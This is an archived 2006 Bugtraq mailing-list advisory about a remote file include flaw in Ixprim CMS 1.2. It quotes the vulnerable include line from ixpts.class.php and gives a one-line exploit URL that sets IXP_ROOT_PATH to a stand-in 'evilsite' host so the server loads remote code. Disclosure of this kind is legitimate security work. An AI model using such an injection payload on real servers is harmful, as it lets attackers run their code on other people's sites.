Ixprim CMS 1.2 Remote File Include Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Ixprim CMS 1.2 Remote File Include Vulnerability
From: vitux.manis@xxxxxxxxx
Date: 19 Nov 2006 09:06:47 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Aplication : Ixprim CMS 1.2

URL 
:http://optusnet.dl.sourceforge.net/sourceforge/ixprim/ixprim-1.2-200603171800.zip

variable ixpts.class.php

include_once( IXP_ROOT_PATH.'/kernel/class/files.class.php' );

Exploit :  
http://www.vuln.com/kernel/class/ixpts.class.php?IXP_ROOT_PATH=http://evilsite

vitux
 
#vitux.manis@xxxxxxxxx

Prev by Date: Dovecot IMAP/POP3 server: Off-by-one buffer overflow
Next by Date: Digital Armaments November-Decemberr Hacking Challenge: KERNEL
Previous by thread: Dovecot IMAP/POP3 server: Off-by-one buffer overflow
Next by thread: Digital Armaments November-Decemberr Hacking Challenge: KERNEL
Index(es):
- Date
- Thread